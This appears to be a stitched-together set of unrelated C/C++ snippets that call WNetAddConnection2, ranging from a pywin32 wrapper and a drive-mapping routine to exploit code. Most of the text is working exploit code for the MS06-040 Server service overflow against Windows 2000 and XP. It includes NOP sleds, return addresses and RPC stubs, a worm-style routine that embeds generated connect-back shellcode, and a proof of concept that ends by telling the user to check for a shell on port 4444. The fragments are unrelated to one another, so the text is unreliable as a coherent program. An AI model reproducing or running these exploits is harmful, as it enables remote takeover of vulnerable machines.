BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
BOOL LoginRemoteMachine(char* pszMachineName,char* pszUserAccount,char* pszPassWord)
{
NETRESOURCE ns;
char szRemoteName[MAX_PATH] = {0};
ns.dwType = RESOURCETYPE_ANY;
ns.lpProvider = NULL;
ns.lpLocalName = "";
sprintf(szRemoteName,"\\\\%s",pszMachineName);
ns.lpRemoteName = szRemoteName;
DWORD dwResult = 0;
for(int i = 0;i<MAX_RETRY_NUM;i++)
{
if(strcmp(pszPassWord,"NULL") == 0)
dwResult = WNetAddConnection2(&ns,"",pszUserAccount,CONNECT_UPDATE_PROFILE);
else
dwResult = WNetAddConnection2(&ns,pszPassWord,pszUserAccount,CONNECT_UPDATE_PROFILE);
if(dwResult == 0)
break;
Sleep(LOGIN_SLEEP);
}
if(dwResult != NO_ERROR)
{
#ifdef _DEBUG
switch(dwResult)
{
case ERROR_ACCESS_DENIED:
printf("ERROR_ACCESS_DENIED=%ld\r\n",dwResult);
break;
case ERROR_ALREADY_ASSIGNED:
printf("ERROR_ALREADY_ASSIGNED=%ld\r\n",dwResult);
break;
case ERROR_BAD_DEV_TYPE:
printf("ERROR_BAD_DEV_TYPE=%ld\r\n",dwResult);
break;
case ERROR_BAD_DEVICE:
printf("ERROR_BAD_DEVICE=%ld\r\n",dwResult);
break;
case ERROR_BAD_NET_NAME:
printf("ERROR_BAD_NET_NAME=%ld\r\n",dwResult);
break;
case ERROR_BAD_PROFILE:
printf("ERROR_BAD_PROFILE=%ld\r\n",dwResult);
break;
case ERROR_BAD_PROVIDER:
printf("ERROR_BAD_PROVIDER=%ld\r\n",dwResult);
break;
case ERROR_BUSY:
printf("ERROR_BUSY=%ld\r\n",dwResult);
break;
case ERROR_CANCELLED:
printf("ERROR_CANCELLED=%ld\r\n",dwResult);
break;
case ERROR_CANNOT_OPEN_PROFILE:
printf("ERROR_CANNOT_OPEN_PROFILE=%ld\r\n",dwResult);
break;
case ERROR_DEVICE_ALREADY_REMEMBERED:
printf("ERROR_DEVICE_ALREADY_REMEMBERED=%ld\r\n",dwResult);
break;
case ERROR_EXTENDED_ERROR:
printf("ERROR_EXTENDED_ERROR=%ld\r\n",dwResult);
break;
case ERROR_INVALID_PASSWORD:
printf("ERROR_INVALID_PASSWORD=%ld\r\n",dwResult);
break;
case ERROR_NO_NET_OR_BAD_PATH:
printf("ERROR_CANNOT_OPEN_PROFILE=%ld\r\n",dwResult);
break;
case ERROR_NO_NETWORK:
printf("ERROR_CANNOT_OPEN_PROFILE=%ld\r\n",dwResult);
break;
default:
printf("Unknown error=%ld\r\n",dwResult);
break;
}
#endif
return FALSE;
}
return TRUE;
}
// @pymethod |win32wnet|WNetAddConnection2|Creates a connection to a network resource. The function can redirect
// a local device to the network resource.
// @comm This function also accepts backwards-compatible, positional-only
// arguments of (dwType, lpLocalName, lpRemoteName[, lpProviderName, Username, Password, flags])
// @comm Accepts keyword arguments.
// @pyseeapi WNetAddConnection2
static PyObject *PyWNetAddConnection2 (PyObject *self, PyObject *args, PyObject *kwargs)
{
LPTSTR Username = NULL;
LPTSTR Password = NULL;
// values used for b/w compat args.
DWORD Type;
PyObject *obLocalName, *obRemoteName, *obProviderName = Py_None;
PyObject *obnr, *obPassword=Py_None, *obUsername=Py_None, *ret=NULL;
DWORD ErrorNo; // holds the returned error number, if any
DWORD flags = 0;
NETRESOURCE *pNetResource;
NETRESOURCE tempNetResource;
memset(&tempNetResource, 0, sizeof(tempNetResource));
if (PyArg_ParseTuple(args,"iOO|OOOi",&Type,&obLocalName,&obRemoteName,&obProviderName,&obUsername,&obPassword, &flags)) {
// the b/w compat args have been used - build the NETRESOURCE structure
memset((void *)&tempNetResource, '\0', sizeof(NETRESOURCE));
tempNetResource.dwType = Type;
if (!PyWinObject_AsTCHAR(obLocalName, &tempNetResource.lpLocalName, TRUE)
|| !PyWinObject_AsTCHAR(obRemoteName, &tempNetResource.lpRemoteName, FALSE)
|| !PyWinObject_AsTCHAR(obProviderName, &tempNetResource.lpProvider, TRUE))
goto done;
pNetResource = &tempNetResource;
} else {
PyErr_Clear();
static char *keywords[] = {"NetResource","Password","UserName","Flags", NULL};
if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O|OOk", keywords,
&obnr, // @pyparm <o PyNETRESOURCE>|NetResource||Describes the network resource for the connection.
&obPassword, // @pyparm str|Password|None|The password to use. Use None for default credentials.
&obUsername, // @pyparm str|UserName|None|The user name to connect as. Use None for default credentials.
&flags)) // @pyparm int|Flags|0|Combination win32netcon.CONNECT_* flags
return NULL;
if (!PyWinObject_AsNETRESOURCE(obnr, &pNetResource, FALSE))
return NULL;
}
if (!PyWinObject_AsTCHAR(obPassword, &Password, TRUE)
|| !PyWinObject_AsTCHAR(obUsername, &Username, TRUE))
goto done;
Py_BEGIN_ALLOW_THREADS
#ifdef _WIN32_WCE_ // Windows CE only has the #3 version...use NULL for HWND to simulate #2
ErrorNo = WNetAddConnection3(NULL, pNetResource, Password, Username, flags);
#else
ErrorNo = WNetAddConnection2(pNetResource, Password, Username, flags);
#endif
Py_END_ALLOW_THREADS
if (ErrorNo != NO_ERROR)
ReturnNetError("WNetAddConnection2", ErrorNo);
else{
Py_INCREF(Py_None);
ret = Py_None;
}
done:
PyWinObject_FreeTCHAR(Password);
PyWinObject_FreeTCHAR(Username);
PyWinObject_FreeTCHAR(tempNetResource.lpLocalName);
PyWinObject_FreeTCHAR(tempNetResource.lpRemoteName);
PyWinObject_FreeTCHAR(tempNetResource.lpProvider);
return ret;
};
void netapi(ExploitInfo_s* pExploitInfo)
{
NETRESOURCE NtRes;
HANDLE hFile;
char szUnc[MAX_PATH];
char szPipe[MAX_PATH];
char szResponse[MAX_PATH];
int nCount;
DWORD dwValue;
DWORD dwTarget = 0x00020804;
char szShellcode[512];
DWORD dwShellcodeSize = GenerateEncodedShellcode(szShellcode, sizeof(szShellcode),
dwShellcodeIpAddress, usShellcodePort,
pExploit[pExploitInfo->dwExploitId].dwExploitId, "\r\n\\_/.", sizeof("\r\n\\_/."));
if (!dwShellcodeSize)
ExitThread(0);
// Determine remote OS
int iTargetOS = FpHost(pExploitInfo->dwRemoteIp, FP_RPC);
if(!iTargetOS)
iTargetOS = FpHost(pExploitInfo->dwRemoteIp, FP_PORT5K);
if(!iTargetOS)
iTargetOS = OS_WIN2K;
ZeroMemory(szStub, sizeof(szStub));
memset(szPath, '\x90', sizeof(szPath));
sprintf(szUnc, "\\\\%s\\PIPE", GetIP(pExploitInfo->dwRemoteIp));
sprintf(szPipe, "\\\\%s\\PIPE\\BROWSER", GetIP(pExploitInfo->dwRemoteIp));
NtRes.dwType = RESOURCETYPE_ANY;
NtRes.lpLocalName = NULL;
NtRes.lpRemoteName = szUnc;
NtRes.lpProvider = NULL;
if (WNetAddConnection2(&NtRes, "", "", 0) != ERROR_SUCCESS) {
ExitThread(0);
}
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
ExitThread(0);
}
if (!TransactNamedPipe(hFile, &RPCBind, sizeof(RPCBind) - 1, szResponse, sizeof(szResponse), &dwValue, NULL)) {
ExitThread(0);
}
if(iTargetOS == OS_WIN2K || iTargetOS == OS_WINNT){
memcpy(szPath + 600, szShellcode, dwShellcodeSize);
for (nCount = 0; nCount < 16; nCount++) {
memcpy(szPath + 1000 + (nCount * 4), &dwTarget, 4);
}
dwValue = 1152;
memcpy(&RPCRequest[8], &dwValue, 2);
dwValue = 1124;
memcpy(&RPCRequest[16], &dwValue, 2);
memcpy(szStub, &RPCRequest, 24);
memcpy(szStub + 24, "\x01\x00\x00\x00", 4);
memcpy(szStub + 28, "\x01\x00\x00\x00", 4);
memcpy(szStub + 32, "\x00\x00\x00\x00", 4);
memcpy(szStub + 36, "\x01\x00\x00\x00", 4);
memcpy(szStub + 40, "\x00\x00\x00\x00", 4);
memcpy(szStub + 44, "\x15\x02\x00\x00", 4);
memcpy(szStub + 48, "\x00\x00\x00\x00", 4);
memcpy(szStub + 52, "\x15\x02\x00\x00", 4);
memcpy(szStub + 56, &szPath, 1064);
memcpy(szStub + 1124, "\x01\x00\x00\x00", 4);
memcpy(szStub + 1128, "\x02\x00\x00\x00", 4);
memcpy(szStub + 1132, "\x00\x00\x00\x00", 4);
memcpy(szStub + 1136, "\x02\x00\x00\x00", 4);
memcpy(szStub + 1140, "\xeb\x02\x00\x00", 4);
memcpy(szStub + 1144, "\x01\x00\x00\x00", 4);
memcpy(szStub + 1148, "\x00\x00\x00\x00", 4);
TransactNamedPipe(hFile, szStub, 1152, szResponse, sizeof(szResponse), &dwValue, NULL);
} else if(iTargetOS == OS_WINXP) {
memcpy(szPath, szShellcode, dwShellcodeSize);
dwValue = dwTarget + 6;
memcpy(szPath + 612, &dwValue, 4);
memcpy(szPath + 624, &dwTarget, 4);
memcpy(szPath + 660, &dwTarget, 4);
memcpy(szPath + 672, &dwTarget, 4);
memcpy(szPath + 708, "\x00\x00", 2);
dwValue = 796;
memcpy(&RPCRequest[8], &dwValue, 2);
dwValue = 772;
memcpy(&RPCRequest[16], &dwValue, 2);
memcpy(szStub, &RPCRequest, 24);
memcpy(szStub + 24, "\x01\x00\x00\x00", 4);
memcpy(szStub + 28, "\x01\x00\x00\x00", 4);
memcpy(szStub + 32, "\x00\x00\x00\x00", 4);
memcpy(szStub + 36, "\x01\x00\x00\x00", 4);
memcpy(szStub + 40, "\x00\x00\x00\x00", 4);
memcpy(szStub + 44, "\x63\x01\x00\x00", 4);
memcpy(szStub + 48, "\x00\x00\x00\x00", 4);
memcpy(szStub + 52, "\x63\x01\x00\x00", 4);
memcpy(szStub + 56, &szPath, 710);
memcpy(szStub + 768, "\x01\x00\x00\x00", 4);
memcpy(szStub + 772, "\x01\x00\x00\x00", 4);
memcpy(szStub + 776, "\x00\x00\x00\x00", 4);
memcpy(szStub + 780, "\x01\x00\x00\x00", 4);
memcpy(szStub + 784, "\x00\x00\x00\x00", 4);
memcpy(szStub + 788, "\x01\x00\x00\x00", 4);
memcpy(szStub + 792, "\x00\x00\x00\x00", 4);
TransactNamedPipe(hFile, szStub, 796, szResponse, sizeof(szResponse), &dwValue, NULL);
if (dwValue) {
TransactNamedPipe(hFile, szStub, 796, szResponse, sizeof(szResponse), &dwValue, NULL);
}
} else
return;
ExitThread(1);
}
int main(int argc, char* argv[])
{
HANDLE hFile;
NETRESOURCE nr;
char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
unsigned int i;
unsigned char szInBuf[4096];
unsigned long dwRead, nWritten;
unsigned char szReqBuf[2096];
if (argc < 3){
printf("[-] Usage: ms06040poc <host> [target]\n");
printf("\t1 - Windows 2000 SP0-SP4\n");
printf("\t2 - Windows XP SP0-SP1\n");
return -1;
}
memset(szReqBuf, 0, sizeof(szReqBuf));
if (atoi(argv[2]) == 1) {
unsigned char szBuff[1064];
// build payload buffer
memset(szBuff, '\x90', 1000);
memcpy(szBuff+630, sc, sizeof(sc));
for(i=1000; i<1064; i+=4) {
memcpy(szBuff+i, "\x04\x08\x02\x00", 4);
}
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count */
memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); /* actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); /* align string */
memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
memcpy(szReqBuf+1140 , "\xeb\x02", 2);
}
if (atoi(argv[2]) == 2) {
unsigned char szBuff[708];
memset(szBuff, '\x90', 612); /* size of shellcode */
memcpy(szBuff, sc, sizeof(sc));
memcpy(szBuff+612, "\x0a\x08\x02\x00", 4);
memset(szBuff+616, 'A', 8); // 8 bytes padding
memcpy(szBuff+624, "\x04\x08\x02\x00", 4);
memset(szBuff+628, '\x90', 32);
memcpy(szBuff+660, "\x04\x08\x02\x00", 4);
memset(szBuff+664, 'B', 8); // 8 bytes padding
memcpy(szBuff+672, "\x04\x08\x02\x00", 4);
memset(szBuff+676, '\x90', 32);
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); /* max count */
memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); /* actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); /* align string */
memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
}
printf("[+] Connecting to %s ... \n", argv[1]);
_snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]);
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = szRemoteName;
if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
printf("[-] Failed to connect to host !\n");
return -1;
}
_snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]);
hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Failed to open named pipe !\n");
return -1;
}
printf("[+] Binding to RPC interface ... \n");
if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
printf("[-] Failed to bind to interface !\n");
CloseHandle(hFile);
return -1;
}
printf("[+] Sending RPC request ... \n");
if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
printf("[-] Unable to transmit RPC request !\n");
CloseHandle(hFile);
return -1;
}
printf("[+] Now check for shell on %s:4444 !\n", argv[1]);
return 0;
}
void CshardDrive::GetMapDriveConnection()
{
string driveName = "R";
//string drivePath="";
string userName = "******";
string passWord = "******";
//cout<<" Enter the Drive path (\\ Your Ip\Drive_Name) format :: ";
//cin>>drivePath;
string drivePath = "\\\\192.168.4.181\\e";
//cout<<"\n Enter the User Name :: ";
//cin>>userName;
//cout<<" \nEnter the Password :: ";
//cin>>passWord;
//cout<<"\n Going to connected the Map drive \n";
string driveListQuery = "select drivename, drivepath, username, password from MAPPED_DRIVE_CONFIGURATION";
SQLIteUitl conn;
bool isconn = conn.ConnectDB("AMAZEHACK.db3");
if(isconn)
{
conn.GetTableData(driveListQuery);
}else
{
cout<<" ######### Unable to connect the DataBase ######## \n";
}
cout<<" drivePath :: "<<drivePath<< " userName :: "<<userName<< " passWord :: "<<passWord<< "\n";
this->shardDriveList->clear();
string tempPath = drivePath;
NETRESOURCE nr;
DWORD res;
TCHAR szUserName[32]=L"", szPassword[32]=L"", szLocalName[32]=L"", szRemoteName[MAX_PATH]=L"";
memcpy(szUserName, userName.c_str(), userName.length());
memcpy(szPassword, passWord.c_str(), passWord.length());
memcpy(szRemoteName, tempPath.c_str(), tempPath.length());
//
// Assign values to the NETRESOURCE structure.
//
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = szRemoteName;
nr.lpProvider = NULL;
res = WNetAddConnection2(&nr, szPassword, szUserName, FALSE);
if (res == NO_ERROR)
{
cout << "The Network Drive " << szRemoteName << " is successfully mapped \n";
map<string, string>::iterator pos = this->shardDriveList->find(driveName);
if(pos == this->shardDriveList->end())
{
this->shardDriveList->insert(pair<string,string>(driveName,drivePath));
}
}else {
cout<<" WNetAddConnection2 gettng failed : Error ::"<<res<<"\n";
}
};
